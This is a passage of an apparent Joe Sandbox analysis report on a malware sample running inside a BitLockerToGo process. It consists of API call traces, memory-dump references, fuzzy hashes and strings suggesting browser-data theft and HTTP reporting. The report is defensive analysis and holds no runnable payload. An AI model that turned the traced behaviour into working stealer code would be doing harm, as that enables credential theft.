                                                                                                                                                      • SetEnvironmentVariableA.KERNEL32(029E4968,00000000,00000000,?,027712D8,?,02760153,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,02770AFE), ref: 0275A132
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0275A0B2, 0275A0C6, 0275A0DC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                      • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                      • API String ID: 2929475105-3463377506
                                                                                                                                                      • Opcode ID: 2ec94543d13028e925707535af1b06990d871c21f01b540016d9e832e024ac44
                                                                                                                                                      • Instruction ID: aae388855ea6a943c1a6a4bff71b5d4ce5bdf4706c9a7a0efe18d200e646d8b4
                                                                                                                                                      • Opcode Fuzzy Hash: 2ec94543d13028e925707535af1b06990d871c21f01b540016d9e832e024ac44
                                                                                                                                                      • Instruction Fuzzy Hash: FA41A4B1D49204AFCB06DFACE85ABBE73B5FB48315F500929E905A3380EB755954CF60
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 02768B60: GetSystemTime.KERNEL32(?,029D9928,027705AE,?,?,?,?,?,?,?,?,?,02754963,?,00000014), ref: 02768B86
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0275A2E1
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000), ref: 0275A3FF
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275A6BC
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 02759E10: memcmp.MSVCRT(?,v20,00000003), ref: 02759E2D
                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0275A743
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 257331557-0
                                                                                                                                                      • Opcode ID: 8364ac8ba92e2eebff7e93285bcc693a98ad22503bb60e1bd9a0fca0432cdbc5
                                                                                                                                                      • Instruction ID: fab18015baca243e54138efd77b670fcf88407306736f9c53827d4b754f63682
                                                                                                                                                      • Opcode Fuzzy Hash: 8364ac8ba92e2eebff7e93285bcc693a98ad22503bb60e1bd9a0fca0432cdbc5
                                                                                                                                                      • Instruction Fuzzy Hash: 13E1CB72C101199ADB06FBA4DD9DEFEB37AAF14300F508569E91676090EF306A4DCFA4
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 02768B60: GetSystemTime.KERNEL32(?,029D9928,027705AE,?,?,?,?,?,?,?,?,?,02754963,?,00000014), ref: 02768B86
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0275D801
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275D99F
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275D9B3
                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0275DA32
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 211194620-0
                                                                                                                                                      • Opcode ID: fcf545cd816d66fe2cf150c80bb70362931835769434aef9eb134f041f1bcdde
                                                                                                                                                      • Instruction ID: c791d04f666c698c02f0a2be14b71cb9ea7c60094c39dda93c4ccaaad25ab9e3
                                                                                                                                                      • Opcode Fuzzy Hash: fcf545cd816d66fe2cf150c80bb70362931835769434aef9eb134f041f1bcdde
                                                                                                                                                      • Instruction Fuzzy Hash: D881E8729101199ADB06FBA4DDADEFE737AEF14300F504529E907B6090EF346A09CFA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 027599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 027599EC
                                                                                                                                                        • Part of subcall function 027599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02759A11
                                                                                                                                                        • Part of subcall function 027599C0: LocalAlloc.KERNEL32(00000040,?), ref: 02759A31
                                                                                                                                                        • Part of subcall function 027599C0: ReadFile.KERNEL32(000000FF,?,00000000,027602E7,00000000), ref: 02759A5A
                                                                                                                                                        • Part of subcall function 027599C0: LocalFree.KERNEL32(027602E7), ref: 02759A90
                                                                                                                                                        • Part of subcall function 027599C0: CloseHandle.KERNEL32(000000FF), ref: 02759A9A
                                                                                                                                                        • Part of subcall function 02768E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02768E52
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,02771580,02770D92), ref: 0275F54C
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275F56B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                                                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                      • API String ID: 998311485-3310892237
                                                                                                                                                      • Opcode ID: 9c44c6c9b011823a75f5f223e1a46002f220b67edd9c18e50e634eb4cfdb8477
                                                                                                                                                      • Instruction ID: 37a5b049bcae17860562bbb5c834953eb11633c8f4c6112d14c58e6cb1062bd0
                                                                                                                                                      • Opcode Fuzzy Hash: 9c44c6c9b011823a75f5f223e1a46002f220b67edd9c18e50e634eb4cfdb8477
                                                                                                                                                      • Instruction Fuzzy Hash: 5951FC71D10209AADB06FFA4DC9DDFE777AAF54300F508528ED16B6190EE346A09CFA1
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,027705B7), ref: 027686CA
                                                                                                                                                      • Process32First.KERNEL32(?,00000128), ref: 027686DE
                                                                                                                                                      • Process32Next.KERNEL32(?,00000128), ref: 027686F3
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 02768761
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1066202413-0
                                                                                                                                                      • Opcode ID: 7f5a66e9df71a8fcf3f5367436d09579517e7dfd613802220f18f965de71b002
                                                                                                                                                      • Instruction ID: 9ed9476ff1157322614234342ec38ee5ca7fe2d9697643738632f27543d299d5
                                                                                                                                                      • Opcode Fuzzy Hash: 7f5a66e9df71a8fcf3f5367436d09579517e7dfd613802220f18f965de71b002
                                                                                                                                                      • Instruction Fuzzy Hash: 1131A071901219ABDB25DF94CC59FFEB7B9EF04700F0041A9E90AB2190DB306A45CFA0
                                                                                                                                                      APIs
                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,029D0578,?,0277110C,?,00000000,?,02771110,?,00000000,02770AEF), ref: 02766ACA
                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02766AE8
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02766AF9
                                                                                                                                                      • Sleep.KERNEL32(00001770), ref: 02766B04
                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,?,029D0578,?,0277110C,?,00000000,?,02771110,?,00000000,02770AEF), ref: 02766B1A
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 02766B22
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 941982115-0
                                                                                                                                                      • Opcode ID: 8a88d461f6ee0c7dfca0a35243b9ead601def5d6fc49fa93f04d37ad1738c799
                                                                                                                                                      • Instruction ID: 3d373f7a09483cfb28cba8214882f4390c5967a0eb54da0945f6f0821b165537
                                                                                                                                                      • Opcode Fuzzy Hash: 8a88d461f6ee0c7dfca0a35243b9ead601def5d6fc49fa93f04d37ad1738c799
                                                                                                                                                      • Instruction Fuzzy Hash: F4F05870E8420AEFE711BBA0DC1EBBE7B39EB04701F908915AD06A11C0CBB65540CAA9
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 02756280: InternetOpenA.WININET(02770DFE,00000001,00000000,00000000,00000000), ref: 027562E1
                                                                                                                                                        • Part of subcall function 02756280: StrCmpCA.SHLWAPI(?,029E4B88), ref: 02756303
                                                                                                                                                        • Part of subcall function 02756280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02756335
                                                                                                                                                        • Part of subcall function 02756280: HttpOpenRequestA.WININET(00000000,GET,?,029E5F38,00000000,00000000,00400100,00000000), ref: 02756385
                                                                                                                                                        • Part of subcall function 02756280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 027563BF
                                                                                                                                                        • Part of subcall function 02756280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 027563D1
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 02765228
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
